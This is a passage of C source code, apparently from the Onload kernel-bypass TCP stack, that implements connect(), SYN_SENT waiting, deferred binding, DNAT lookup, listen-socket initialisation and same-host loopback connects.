ni->state->stats.tcp_seq_table_hits++; return seq_no; } void ci_tcp_prev_seq_remember(ci_netif* ni, ci_tcp_state* ts) { ci_tcp_prev_seq_t ts_prev_seq; if( NI_OPTS(ni).tcp_isn_mode != 1 ) return; if( ! NI_OPTS(ni).tcp_isn_include_passive && ts->tcpflags & CI_TCPT_FLAG_PASSIVE_OPENED ) return; /* We record the final sequence number, so we must have sent a FIN. If the * peer is not in TIME_WAIT, then we don't need to bother remembering the * sequence number. As such, we should call this function precisely when * entering LAST_ACK or CLOSING. */ if( ts->s.b.state != CI_TCP_CLOSING ) ci_assert_equal(ts->s.b.state, CI_TCP_LAST_ACK); ci_tcp_prev_seq_from_ts(ni, ts, &ts_prev_seq); if( __ci_tcp_prev_seq_remember(ni, &ts_prev_seq) ) ts->tcpflags |= CI_TCPT_FLAG_SEQNO_REMEMBERED; } /* Linux clears implicit address on connect failure */ ci_inline void ci_tcp_connect_drop_implicit_address(ci_tcp_state *ts) { if( ! (ts->s.cp.sock_cp_flags & OO_SCP_BOUND_ADDR) ) { #if CI_CFG_IPV6 if( ts->s.domain == AF_INET6 ) ts->s.cp.laddr = ts->s.laddr = addr_any; else #endif ts->s.cp.laddr = ts->s.laddr = ip4_addr_any; } } /* Return codes from ci_tcp_connect_ul_start(). */ #define CI_CONNECT_UL_OK 0 #define CI_CONNECT_UL_FAIL -1 #define CI_CONNECT_UL_START_AGAIN -2 #define CI_CONNECT_UL_LOCK_DROPPED -3 #define CI_CONNECT_UL_ALIEN_BOUND -4 /* The fd parameter is ignored when this is called in the kernel */ static int ci_tcp_connect_ul_start(ci_netif *ni, ci_tcp_state* ts, ci_fd_t fd, ci_addr_t dst, unsigned dport_be16, int* fail_rc) { ci_ip_pkt_fmt* pkt; int rc = 0; oo_sp active_wild = OO_SP_NULL; ci_uint32 prev_seq = 0; int added_scalable = 0; ci_addr_t saddr; ci_assert(ts->s.pkt.mtu); ts->tcpflags &=~ CI_TCPT_FLAG_FIN_RECEIVED; /* Now that we know the outgoing route, set the MTU related values. * Note, even these values are speculative since the real MTU * could change between now and passing the packet to the lower layers */ ts->amss = ci_tcp_amss(ni, &ts->c, &ts->s.pkt, __func__); /* Default smss until discovered by MSS option in SYN - RFC1122 4.2.2.6 */ ts->smss = CI_CFG_TCP_DEFAULT_MSS; /* set pmtu, eff_mss, snd_buf and adjust windows */ ci_tcp_set_eff_mss(ni, ts); ci_tcp_set_initialcwnd(ni, ts); /* Send buffer adjusted by ci_tcp_set_eff_mss(), but we want it to stay * zero until the connection is established. */ ts->so_sndbuf_pkts = 0; /* Reset ka_probes if it is a second connect after failure. */ ts->ka_probes = 0; /* * 3. State and address are OK. It's address routed through our NIC. * Do connect(). */ ci_assert(!CI_IPX_ADDR_IS_ANY(ipcache_laddr(&ts->s.pkt))); /* socket can only could have gotten scalative on prior * implicit bind */ ci_assert_impl(ts->s.s_flags & CI_SOCK_FLAG_SCALACTIVE, ~ts->s.s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND); if( ts->s.s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND ) { ci_uint16 source_be16 = 0; ci_sock_cmn* s = &ts->s; saddr = sock_ipx_laddr(&ts->s); #ifndef __KERNEL__ active_wild = ci_netif_active_wild_get(ni, sock_ipx_laddr(&ts->s), sock_ipx_raddr(&ts->s), dport_be16, &source_be16, &prev_seq); #endif /* Defer active_wild related state update to after potential lock drops * (pkt wait) */ if( active_wild == OO_SP_NULL ) { if( NI_OPTS(ni).tcp_shared_local_no_fallback ) /* error matching exhaustion of ephemeral ports */ CI_SET_ERROR(rc, EADDRNOTAVAIL); else if( s->cp.sock_cp_flags & OO_SCP_BOUND_ADDR ) rc = __ci_tcp_bind(ni, &ts->s, fd, saddr, &source_be16, 0); else rc = __ci_tcp_bind(ni, &ts->s, fd, addr_any, &source_be16, 0); if(CI_UNLIKELY( rc != 0 )) { LOG_U(ci_log("__ci_tcp_bind returned %d at %s:%d", rc, __FILE__, __LINE__)); *fail_rc = rc; return CI_CONNECT_UL_FAIL; } if(CI_UNLIKELY( CI_IPX_ADDR_IS_ANY(saddr) )) { /* FIXME is this an impossible branch? */ CI_SET_ERROR(*fail_rc, EINVAL); return CI_CONNECT_UL_FAIL; } } /* Commit source port now. In case of failure down the lane, an implicit port * might be overwritten by following attempt */ TS_IPX_TCP(ts)->tcp_source_be16 = source_be16; ts->s.cp.lport_be16 = source_be16; LOG_TC(log(LNT_FMT "connect: our bind returned " IPX_PORT_FMT, LNT_PRI_ARGS(ni, ts), IPX_ARG(AF_IP(saddr)), (unsigned) CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_source_be16))); } /* In the normal case, we only install filters for IP addresses configured on * acceleratable interfaces, and so if the socket is bound to an alien * address, we can't accelerate it. Using a MAC filter overcomes this * limitation, however. */ if( ~ni->state->flags & CI_NETIF_FLAG_USE_ALIEN_LADDRS && (ts->s.s_flags & CI_SOCK_FLAG_BOUND_ALIEN) && ! (ts->s.pkt.flags & CI_IP_CACHE_IS_LOCALROUTE || ts->s.s_flags & (CI_SOCK_FLAG_TPROXY | CI_SOCK_FLAG_SCALACTIVE)) ) { ci_assert_equal(active_wild, OO_SP_NULL); return CI_CONNECT_UL_ALIEN_BOUND; } /* Commit peer now - these are OK to be overwritten by following attempt */ ci_tcp_set_peer(ts, dst, dport_be16); /* Make sure we can get a buffer before we change state. */ pkt = ci_netif_pkt_tx_tcp_alloc(ni, ts); if( CI_UNLIKELY(! pkt) ) { /* Should we block or return error? */ if( NI_OPTS(ni).tcp_nonblock_no_pkts_mode && (ts->s.b.sb_aflags & (CI_SB_AFLAG_O_NONBLOCK | CI_SB_AFLAG_O_NDELAY)) ) { CI_SET_ERROR(*fail_rc, ENOBUFS); rc = CI_CONNECT_UL_FAIL; goto fail; } /* NB. We've already done a poll above. */ rc = ci_netif_pkt_wait(ni, &ts->s, CI_SLEEP_NETIF_LOCKED|CI_SLEEP_NETIF_RQ); if( ci_netif_pkt_wait_was_interrupted(rc) ) { CI_SET_ERROR(*fail_rc, -rc); rc = CI_CONNECT_UL_LOCK_DROPPED; goto fail; } /* OK, there are (probably) packets available - go try again. Note we * jump back to the top of the function because someone may have * connected this socket in the mean-time, so we need to check the * state once more. */ rc = CI_CONNECT_UL_START_AGAIN; goto fail; } #ifdef ONLOAD_OFE if( ni->ofe_channel != NULL ) ts->s.ofe_code_start = ofe_socktbl_find( ni->ofe, OFE_SOCKTYPE_TCP_ACTIVE, tcp_laddr_be32(ts), tcp_raddr_be32(ts), tcp_lport_be16(ts), tcp_rport_be16(ts)); else ts->s.ofe_code_start = OFE_ADDR_NULL; #endif if( active_wild != OO_SP_NULL && (ts->s.s_flags & CI_SOCK_FLAG_TPROXY) == 0 ) { /* Need to set the flag now for consumption by ci_tcp_ep_set_filters */ ts->s.s_flags |= CI_SOCK_FLAG_SCALACTIVE; added_scalable = 1; } rc = ci_tcp_ep_set_filters(ni, S_SP(ts), ts->s.cp.so_bindtodevice, active_wild); if( rc < 0 ) { /* Perhaps we've run out of filters? See if we can push a socket out * of timewait and steal its filter. */ ci_assert_nequal(rc, -EFILTERSSOME); if( rc != -EBUSY || ! ci_netif_timewait_try_to_free_filter(ni) || (rc = ci_tcp_ep_set_filters(ni, S_SP(ts), ts->s.cp.so_bindtodevice, active_wild)) < 0 ) { ci_assert_nequal(rc, -EFILTERSSOME); /* Either a different error, or our efforts to free a filter did not * work. */ if( added_scalable ) ts->s.s_flags &= ~CI_SOCK_FLAG_SCALACTIVE; /* rollback scalactive flag */ ci_netif_pkt_release(ni, pkt); CI_SET_ERROR(*fail_rc, -rc); rc = CI_CONNECT_UL_FAIL; goto fail; } } /* Point of no failure */ /* Commit active_wild related flags */ if( active_wild != OO_SP_NULL ) { ts->tcpflags |= CI_TCPT_FLAG_ACTIVE_WILD; ts->s.s_flags &= ~(CI_SOCK_FLAG_DEFERRED_BIND | CI_SOCK_FLAG_CONNECT_MUST_BIND); } LOG_TC(log(LNT_FMT "CONNECT " IPX_PORT_FMT "->" IPX_PORT_FMT, LNT_PRI_ARGS(ni, ts), IPX_ARG(AF_IP(ipcache_laddr(&ts->s.pkt))), (unsigned) CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_source_be16), IPX_ARG(AF_IP(ipcache_raddr(&ts->s.pkt))), (unsigned) CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_dest_be16))); /* We are going to send the SYN - set states appropriately */ /* We test prev_seq in a moment, which is always zero in the kernel, but * that's OK, because this function is only called in the kernel for loopback * connections. */ if( NI_OPTS(ni).tcp_isn_mode == 1 ) { if( prev_seq == 0 ) { prev_seq = ci_tcp_prev_seq_lookup(ni, ts); } else { #ifndef NDEBUG /* If we got a sequence number from TIME_WAIT-reuse, the table should not * have an entry for this four-tuple, as any such entry would now * necessarily be stale. Assert this. Use an intermediate variable to * avoid calling the function more than once. */ ci_uint32 table_seq = ci_tcp_prev_seq_lookup(ni, ts); ci_assert_equal(table_seq, 0); #endif } } if( prev_seq ) /* We're reusing a TIME_WAIT. We do the same as Linux, and choose the new * sequence number a little way from the old. */ tcp_snd_nxt(ts) = prev_seq; else tcp_snd_nxt(ts) = ci_tcp_initial_seqno(ni, tcp_ipx_laddr(ts), TS_IPX_TCP(ts)->tcp_source_be16, tcp_ipx_laddr(ts), TS_IPX_TCP(ts)->tcp_dest_be16); tcp_snd_una(ts) = tcp_enq_nxt(ts) = tcp_snd_up(ts) = tcp_snd_nxt(ts); ts->snd_max = tcp_snd_nxt(ts) + 1; /* Must be after initialising snd_una. */ ci_tcp_clear_rtt_timing(ts); ci_tcp_set_flags(ts, CI_TCP_FLAG_SYN); ts->tcpflags &=~ CI_TCPT_FLAG_OPT_MASK; ts->tcpflags |= NI_OPTS(ni).syn_opts; if( (ts->tcpflags & CI_TCPT_FLAG_WSCL) ) { if( NI_OPTS(ni).tcp_rcvbuf_mode == 1 ) ts->rcv_wscl = ci_tcp_wscl_by_buff(ni, ci_tcp_max_rcvbuf(ni, ts->amss)); else ts->rcv_wscl = ci_tcp_wscl_by_buff(ni, ci_tcp_rcvbuf_established(ni, &ts->s)); CI_IP_SOCK_STATS_VAL_RXWSCL(ts, ts->rcv_wscl); } else { ts->rcv_wscl = 0; CI_IP_SOCK_STATS_VAL_RXWSCL(ts, 0); } ci_tcp_set_rcvbuf(ni, ts); TS_IPX_TCP(ts)->tcp_window_be16 = ci_tcp_calc_rcv_wnd_syn(ts->s.so.rcvbuf, ts->amss, ts->rcv_wscl); tcp_rcv_wnd_right_edge_sent(ts) = tcp_rcv_nxt(ts) + TS_IPX_TCP(ts)->tcp_window_be16; ts->rcv_wnd_advertised = TS_IPX_TCP(ts)->tcp_window_be16; TS_IPX_TCP(ts)->tcp_window_be16 = CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_window_be16); /* outgoing_hdrs_len is initialised to include timestamp option. */ if( ! (ts->tcpflags & CI_TCPT_FLAG_TSO) ) ts->outgoing_hdrs_len = CI_IPX_HDR_SIZE(ipcache_af(&ts->s.pkt)) + sizeof(ci_tcp_hdr); if( ci_tcp_can_stripe(ni, ts->s.pkt.ipx.ip4.ip_saddr_be32, ts->s.pkt.ipx.ip4.ip_daddr_be32) ) ts->tcpflags |= CI_TCPT_FLAG_STRIPE; ci_tcp_set_slow_state(ni, ts, CI_TCP_SYN_SENT); /* If the app trys to send data on a socket in SYN_SENT state ** then the data is queued for send until the SYN gets ACKed. ** (rfc793 p56) ** ** Receive calls on the socket should block until data arrives ** (rfc793 p58) ** ** Clearing tx_errno and rx_errno acheive this. The transmit window ** is set to 1 byte which ensures that only the SYN packet gets ** sent until the ACK is received with more window. */ ci_assert(ts->snd_max == tcp_snd_nxt(ts) + 1); ts->s.rx_errno = 0; ts->s.tx_errno = 0; /* If ARP resolution fails, we have to drop the connection, so we store * the socket id in the SYN packet. */ pkt->pf.tcp_tx.sock_id = ts->s.b.bufid; ci_tcp_enqueue_no_data(ts, ni, pkt); ci_tcp_set_flags(ts, CI_TCP_FLAG_ACK); if( ts->s.b.sb_aflags & (CI_SB_AFLAG_O_NONBLOCK | CI_SB_AFLAG_O_NDELAY) ) { ts->tcpflags |= CI_TCPT_FLAG_NONBLOCK_CONNECT; LOG_TC(log( LNT_FMT "Non-blocking connect - return EINPROGRESS", LNT_PRI_ARGS(ni, ts))); CI_SET_ERROR(*fail_rc, EINPROGRESS); /* We don't jump to the "fail" label here, as this is a failure only from * the point of view of the connect() API, and we don't want to tear down * the socket. */ return CI_CONNECT_UL_FAIL; } return CI_CONNECT_UL_OK; fail: ci_tcp_connect_drop_implicit_address(ts); return rc; } ci_inline int ci_tcp_connect_handle_so_error(ci_sock_cmn *s) { ci_int32 rc = ci_get_so_error(s); if( rc == 0 ) return 0; s->rx_errno = ENOTCONN; return rc; } static int ci_tcp_connect_ul_syn_sent(ci_netif *ni, ci_tcp_state *ts) { int rc = 0; if( ts->s.b.state == CI_TCP_SYN_SENT ) { ci_uint32 timeout = ts->s.so.sndtimeo_msec; ci_netif_poll(ni); if( OO_SP_NOT_NULL(ts->local_peer) ) { /* No reason to sleep. Obviously, listener have dropped our syn * because of some reason. Go away! */ ci_tcp_drop(ni, ts, EBUSY); RET_WITH_ERRNO(EBUSY); } #ifndef __KERNEL__ /* This "if" starts and ends with the stack being locked. It can * release the stack lock while spinning. */ if( oo_per_thread_get()->spinstate & (1 << ONLOAD_SPIN_TCP_CONNECT) ) { ci_uint64 start_frc, now_frc, schedule_frc; citp_signal_info* si = citp_signal_get_specific_inited(); ci_uint64 max_spin = ts->s.b.spin_cycles; int stack_locked = 1; if( ts->s.so.sndtimeo_msec ) { ci_uint64 max_so_spin = (ci_uint64)ts->s.so.sndtimeo_msec * IPTIMER_STATE(ni)->khz; if( max_so_spin <= max_spin ) max_spin = max_so_spin; } ci_frc64(&start_frc); schedule_frc = start_frc; now_frc = start_frc; do { if( ci_netif_may_poll(ni) ) { if( ci_netif_need_poll_spinning(ni, now_frc) ) { if( stack_locked || ci_netif_trylock(ni) ) { ci_netif_poll_n(ni, NI_OPTS(ni).evs_per_poll); ci_netif_unlock(ni); stack_locked = 0; } } else if( ! ni->state->is_spinner ) ni->state->is_spinner = 1; } if( ts->s.b.state != CI_TCP_SYN_SENT ) { ni->state->is_spinner = 0; if( ! stack_locked ) ci_netif_lock(ni); rc = 0; goto out; } /* Unlock the stack to allow kernel to process ICMP */ if( stack_locked ) { ci_netif_unlock(ni); stack_locked = 0; } ci_frc64(&now_frc); rc = OO_SPINLOOP_PAUSE_CHECK_SIGNALS(ni, now_frc, &schedule_frc, ts->s.so.sndtimeo_msec, NULL, si); if( rc != 0 ) { ni->state->is_spinner = 0; if( ! stack_locked ) ci_netif_lock(ni); goto out; } #if CI_CFG_SPIN_STATS ni->state->stats.spin_tcp_connect++; #endif } while( now_frc - start_frc < max_spin ); ni->state->is_spinner = 0; if( ! stack_locked ) ci_netif_lock(ni); if( timeout ) { ci_uint32 spin_ms = (start_frc - now_frc) / IPTIMER_STATE(ni)->khz; if( spin_ms < timeout ) timeout -= spin_ms; else { if( ts->s.b.state == CI_TCP_SYN_SENT ) rc = -EAGAIN; goto out; } } } #endif CI_TCP_SLEEP_WHILE(ni, ts, CI_SB_FLAG_WAKE_RX, timeout, ts->s.b.state == CI_TCP_SYN_SENT, &rc); } #ifndef __KERNEL__ out: #endif if( rc == -EAGAIN ) { LOG_TC(log( LNT_FMT "timeout on sleep: %d", LNT_PRI_ARGS(ni, ts), -rc)); if( ! (ts->tcpflags & CI_TCPT_FLAG_NONBLOCK_CONNECT) ) { ts->tcpflags |= CI_TCPT_FLAG_NONBLOCK_CONNECT; CI_SET_ERROR(rc, EINPROGRESS); } else CI_SET_ERROR(rc, EALREADY); return rc; } else if( rc == -EINTR ) { LOG_TC(log(LNT_FMT "connect() was interrupted by a signal", LNT_PRI_ARGS(ni, ts))); ts->tcpflags |= CI_TCPT_FLAG_NONBLOCK_CONNECT; CI_SET_ERROR(rc, EINTR); return rc; } /*! \TODO propagate the correct error code: CONNREFUSED, NOROUTE, etc. */ if( ts->s.b.state == CI_TCP_CLOSED ) { /* Bug 3558: * Set OS socket state to allow/disallow next bind(). * It is Linux hack. */ if( ts->s.b.sb_aflags & CI_SB_AFLAG_OS_BACKED ) { #ifdef __ci_driver__ CI_TRY(efab_tcp_helper_set_tcp_close_os_sock( netif2tcp_helper_resource(ni), S_SP(ts))); #else CI_TRY(ci_tcp_helper_set_tcp_close_os_sock(ni, S_SP(ts))); #endif } /* We should re-bind socket on the next use if the port was determined by * OS. */ if( ! (ts->s.s_flags & CI_SOCK_FLAG_PORT_BOUND) ) ts->s.s_flags |= CI_SOCK_FLAG_CONNECT_MUST_BIND; /* - if SO_ERROR is set, handle it and return this value; * - else if rx_errno is set, return it; * - else (TCP_RX_ERRNO==0, socket is CI_SHUT_RD) return ECONNABORTED */ if( (rc = ci_tcp_connect_handle_so_error(&ts->s)) == 0) rc = TCP_RX_ERRNO(ts) ? TCP_RX_ERRNO(ts) : ECONNABORTED; CI_SET_ERROR(rc, rc); ci_tcp_connect_drop_implicit_address(ts); return rc; } return 0; } #ifndef __KERNEL__ static int complete_deferred_bind(ci_netif* netif, ci_sock_cmn* s, ci_fd_t fd) { ci_uint16 source_be16 = 0; int rc; ci_assert_flags(s->s_flags, CI_SOCK_FLAG_DEFERRED_BIND); if( s->cp.sock_cp_flags & OO_SCP_BOUND_ADDR ) rc = __ci_tcp_bind(netif, s, fd, s->laddr, &source_be16, 0); else rc = __ci_tcp_bind(netif, s, fd, addr_any, &source_be16, 0); if(CI_LIKELY( rc == 0 )) { s->s_flags &= ~(CI_SOCK_FLAG_DEFERRED_BIND | CI_SOCK_FLAG_CONNECT_MUST_BIND); sock_lport_be16(s) = source_be16; s->cp.lport_be16 = source_be16; LOG_TC(log(NSS_FMT "Deferred bind returned " IPX_FMT " :%u", NSS_PRI_ARGS(netif, s), IPX_ARG(AF_IP(addr_any)), ntohs(sock_lport_be16(s)))); } else { LOG_U(ci_log("__ci_tcp_bind returned %d at %s:%d", CI_GET_ERROR(rc), __FILE__, __LINE__)); } return rc; } static int ci_tcp_retrieve_addr(ci_netif* netif, const struct sockaddr* serv_addr, ci_addr_t* dst_addr, ci_uint16* dst_port) { /* Address family is validated to be AF_INET or AF_INET6 earlier. */ const struct sockaddr_in* inaddr = (struct sockaddr_in*) serv_addr; *dst_addr = ci_get_addr(serv_addr); *dst_port = inaddr->sin_port; int rc = 0; /* Only perform DNAT off of init_net */ if( netif->cplane_init_net != NULL ) { ci_addr_sh_t dnat_addr = CI_ADDR_SH_FROM_ADDR(*dst_addr); rc = cp_svc_check_dnat(netif->cplane_init_net, &dnat_addr, dst_port); *dst_addr = CI_ADDR_FROM_ADDR_SH(dnat_addr); } return rc; } /* Returns: * 0 on success * * CI_SOCKET_ERROR (and errno set) * this is a normal error that is returned to the * the application * * CI_SOCKET_HANDOVER we tell the upper layers to handover, no need * to set errno since it isn't a real error */ int ci_tcp_connect(citp_socket* ep, const struct sockaddr* serv_addr, socklen_t addrlen, ci_fd_t fd, int *p_moved) { ci_sock_cmn* s = ep->s; ci_tcp_state* ts = &SOCK_TO_WAITABLE_OBJ(s)->tcp; int rc = 0, crc; ci_addr_t dst_addr; ci_uint16 dst_port; int /*bool*/ dnat; if( NI_OPTS(ep->netif).tcp_connect_handover ) return CI_SOCKET_HANDOVER; /* Make sure we're up-to-date. */ ci_netif_lock(ep->netif); CHECK_TEP(ep); ci_netif_poll(ep->netif); /* * 1. Check if state of the socket is OK for connect operation. */ start_again: if( (rc = ci_tcp_connect_handle_so_error(s)) != 0) { CI_SET_ERROR(rc, rc); goto unlock_out; } if( s->b.state != CI_TCP_CLOSED ) { /* see if progress can be made on this socket before ** determining status (e.g. non-blocking connect and connect poll)*/ if( s->b.state & CI_TCP_STATE_SYNCHRONISED ) { if( ts->tcpflags & CI_TCPT_FLAG_NONBLOCK_CONNECT ) { ts->tcpflags &= ~CI_TCPT_FLAG_NONBLOCK_CONNECT; rc = 0; goto unlock_out; } if( serv_addr->sa_family == AF_UNSPEC ) LOG_E(ci_log("Onload does not support TCP disconnect via " "connect(addr->sa_family==AF_UNSPEC)")); CI_SET_ERROR(rc, EISCONN); } else if( s->b.state == CI_TCP_LISTEN ) { #if CI_CFG_POSIX_CONNECT_AFTER_LISTEN CI_SET_ERROR(rc, EOPNOTSUPP); #else if( ci_tcp_validate_sa(s->domain, serv_addr, addrlen) ) { /* Request should be forwarded to OS */ rc = CI_SOCKET_HANDOVER; goto unlock_out; } if( serv_addr->sa_family == AF_UNSPEC ) { /* Linux does listen shutdown on disconnect (AF_UNSPEC) */ ci_netif_unlock(ep->netif); rc = ci_tcp_shutdown(ep, SHUT_RD, fd); goto out; } else { /* Linux has curious error reporting in this case */ CI_SET_ERROR(rc, EISCONN); } #endif } else { /* Socket is in SYN-SENT state. Let's block for receiving SYN-ACK */ ci_assert_equal(s->b.state, CI_TCP_SYN_SENT); if( s->b.sb_aflags & (CI_SB_AFLAG_O_NONBLOCK | CI_SB_AFLAG_O_NDELAY) ) CI_SET_ERROR(rc, EALREADY); else goto syn_sent; } goto unlock_out; } /* Check if we've ever been connected. */ if( ts->tcpflags & CI_TCPT_FLAG_WAS_ESTAB ) { CI_SET_ERROR(rc, EISCONN); goto unlock_out; } /* * 2. Check address parameter, if it's inappropriate for handover * decision or handover should be done, try to to call OS and * do handover on success. */ if ( /* Af first, check that address family and length is OK. */ ci_tcp_validate_sa(s->domain, serv_addr, addrlen) /* Check for NAT. */ || (dnat = ci_tcp_retrieve_addr(ep->netif, serv_addr, &dst_addr, &dst_port)) < 0 /* rfc793 p54 if the foreign socket is unspecified return */ /* "error: foreign socket unspecified" (EINVAL), but keep it to OS */ || CI_IPX_ADDR_IS_ANY(dst_addr) /* Zero destination port is tricky as well, keep it to OS */ || dst_port == 0 ) { rc = CI_SOCKET_HANDOVER; goto unlock_out; } #if CI_CFG_IPV6 if( CI_IPX_IS_LINKLOCAL(dst_addr) && ci_sock_set_ip6_scope_id(ep->netif, s, serv_addr, addrlen, 1) ) { rc = CI_SOCKET_HANDOVER; goto unlock_out; } #endif /* is this a socket that we can handle? */ rc = ci_tcp_connect_check_dest(ep, dst_addr, dst_port); if( rc ) goto unlock_out; if( (ts->s.pkt.flags & CI_IP_CACHE_IS_LOCALROUTE) && OO_SP_IS_NULL(ts->local_peer) ) { /* Try to connect to another stack; handover if can't */ struct oo_op_loopback_connect op; op.dst_port = dst_port; op.dst_addr = dst_addr; /* this operation unlocks netif */ rc = oo_resource_op(fd, OO_IOC_TCP_LOOPBACK_CONNECT, &op); if( rc < 0) return CI_SOCKET_HANDOVER; if( op.out_moved ) *p_moved = 1; if( op.out_rc == -EINPROGRESS ) RET_WITH_ERRNO( EINPROGRESS ); else if( op.out_rc == -EAGAIN ) RET_WITH_ERRNO(EAGAIN); else if( op.out_rc != 0 ) return CI_SOCKET_HANDOVER; return 0; } if( dnat ) { ts->s.s_flags |= CI_SOCK_FLAG_DNAT; ts->pre_nat.daddr_be32 = ci_get_addr(serv_addr); ts->pre_nat.dport_be16 = ((struct sockaddr_in*) serv_addr)->sin_port; } crc = ci_tcp_connect_ul_start(ep->netif, ts, fd, dst_addr, dst_port, &rc); if( crc != CI_CONNECT_UL_OK ) { switch( crc ) { case CI_CONNECT_UL_ALIEN_BOUND: rc = CI_SOCKET_HANDOVER; /* Fall through. */ case CI_CONNECT_UL_FAIL: /* Check non-blocking */ if( errno == EINPROGRESS ) { CI_TCP_STATS_INC_ACTIVE_OPENS( ep->netif ); } goto unlock_out; case CI_CONNECT_UL_LOCK_DROPPED: goto out; case CI_CONNECT_UL_START_AGAIN: goto start_again; } } CI_TCP_STATS_INC_ACTIVE_OPENS( ep->netif ); syn_sent: rc = ci_tcp_connect_ul_syn_sent(ep->netif, ts); unlock_out: ci_netif_unlock(ep->netif); out: if( rc == CI_SOCKET_HANDOVER && (s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND) ) { int rc1 = complete_deferred_bind(ep->netif, &ts->s, fd); if( rc1 < 0 ) return rc1; } return rc; } #endif int ci_tcp_listen_init(ci_netif *ni, ci_tcp_socket_listen *tls) { int i; oo_p sp; /* In theory, we can avoid listenq_tid timer for loopback-only listening * socket, but then it becomes complicated to distinguish different kind * of sockets and clear the timer when needed only. */ sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, listenq_tid)); ci_ip_timer_init(ni, &tls->listenq_tid, sp, "lstq"); tls->listenq_tid.param1 = S_SP(tls); tls->listenq_tid.fn = CI_IP_TIMER_TCP_LISTEN; tls->acceptq_n_in = tls->acceptq_n_out = 0; tls->acceptq_put = CI_ILL_END; tls->acceptq_get = OO_SP_NULL; tls->n_listenq = 0; tls->n_listenq_new = 0; /* Allocate and initialise the listen bucket */ tls->bucket = ci_ni_aux_alloc_bucket(ni); if( OO_P_IS_NULL(tls->bucket) ) return -ENOBUFS; tls->n_buckets = 1; /* Initialise the listenQ. */ for( i = 0; i <= CI_CFG_TCP_SYNACK_RETRANS_MAX; ++i ) { sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, listenq[i])); ci_ni_dllist_init(ni, &tls->listenq[i], sp, "lstq"); } /* Initialize the cache and pending lists for the EP-cache. * See comment at definition for details */ LOG_EP (log ("Initialise cache and pending list for id %d", S_FMT(tls))); #if CI_CFG_FD_CACHING sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, epcache.cache)); ci_ni_dllist_init(ni, &tls->epcache.cache, sp, "epch"); sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, epcache.pending)); ci_ni_dllist_init(ni, &tls->epcache.pending, sp, "eppd"); sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, epcache_connected)); ci_ni_dllist_init(ni, &tls->epcache_connected, sp, "epco"); sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, epcache.fd_states)); ci_ni_dllist_init(ni, &tls->epcache.fd_states, sp, "ecfd"); tls->epcache.avail_stack = oo_ptr_to_statep (ni, &ni->state->passive_cache_avail_stack); tls->cache_avail_sock = ni->state->opts.per_sock_cache_max; #endif return 0; } #ifdef __KERNEL__ int ci_tcp_connect_lo_samestack(ci_netif *ni, ci_tcp_state *ts, oo_sp tls_id, int *stack_locked) { int crc, rc = 0; ci_assert(ci_netif_is_locked(ni)); *stack_locked = 1; ts->local_peer = tls_id; crc = ci_tcp_connect_ul_start(ni, ts, CI_FD_BAD, sock_ipx_raddr(&ts->s), ts->s.pkt.dport_be16, &rc); /* The connect is really finished, but we should return EINPROGRESS * for non-blocking connect and 0 for normal. */ if( crc == CI_CONNECT_UL_OK ) rc = ci_tcp_connect_ul_syn_sent(ni, ts); else if( crc == CI_CONNECT_UL_LOCK_DROPPED ) *stack_locked = 0; return rc; } /* c_ni is assumed to be locked on enterance and is always unlocked on * exit. */ int ci_tcp_connect_lo_toconn(ci_netif *c_ni, oo_sp c_id, ci_addr_t dst, ci_netif *l_ni, oo_sp l_id) { ci_tcp_state *ts; ci_tcp_socket_listen *tls, *alien_tls; citp_waitable_obj *wo; citp_waitable *w; int rc; int stack_locked; ci_assert(ci_netif_is_locked(c_ni)); ci_assert(OO_SP_NOT_NULL(c_id)); ci_assert(OO_SP_NOT_NULL(l_id)); LOG_TC(log("%s: connect %d:%d to %d:%d", __FUNCTION__, c_ni->state->stack_id, OO_SP_TO_INT(c_id), l_ni->state->stack_id, OO_SP_TO_INT(l_id))); alien_tls = SP_TO_TCP_LISTEN(l_ni, l_id); if( (int)ci_tcp_acceptq_n(alien_tls) >= alien_tls->acceptq_max ) { ci_netif_unlock(c_ni); return -EBUSY; } /* In c_ni, create shadow listening socket tls (copy l_id) */ ts = ci_tcp_get_state_buf(c_ni); if( ts == NULL ) { ci_netif_unlock(c_ni); LOG_E(ci_log("%s: [%d] out of socket buffers", __FUNCTION__, NI_ID(c_ni))); return -ENOMEM; } /* init common tcp fields */ ts->s.so = alien_tls->s.so; ts->s.cp.ip_ttl = alien_tls->s.cp.ip_ttl; S_IPX_TCP_HDR(&ts->s)->tcp_source_be16 = S_IPX_TCP_HDR(&alien_tls->s)->tcp_source_be16; ts->s.domain = alien_tls->s.domain; ts->c = alien_tls->c; ts->c.tcp_defer_accept = OO_TCP_DEFER_ACCEPT_OFF; /* make sure nobody will ever connect to our "shadow" socket * except us */ ci_bit_set(&ts->s.b.sb_aflags, CI_SB_AFLAG_ORPHAN_BIT); ci_tcp_set_slow_state(c_ni, ts, CI_TCP_LISTEN); tls = SOCK_TO_TCP_LISTEN(&ts->s); /* no timer: */ tls->s.s_flags = alien_tls->s.s_flags | CI_SOCK_FLAG_BOUND_ALIEN; tls->acceptq_max = 1; rc = ci_tcp_listen_init(c_ni, tls); if( rc != 0 ) { citp_waitable_obj_free(c_ni, &tls->s.b); ci_netif_unlock(c_ni); return rc; } /* Connect c_id to tls */ ts = SP_TO_TCP(c_ni, c_id); rc = ci_tcp_connect_lo_samestack(c_ni, ts, tls->s.b.bufid, &stack_locked); /* We have to destroy the shadow listener in the connecting stack, * so we really need to get the stack lock. */ if( ! stack_locked ) { int rc1 = ci_netif_lock(c_ni); if( rc1 != 0 ) { /* we leak the shadow listener and a synrecv state, but so be it */ ci_log("%s([%d:%d] to [%d:%d]): leaking the shadow listener " "[%d:%d] rc=%d", __func__, c_ni->state->stack_id, 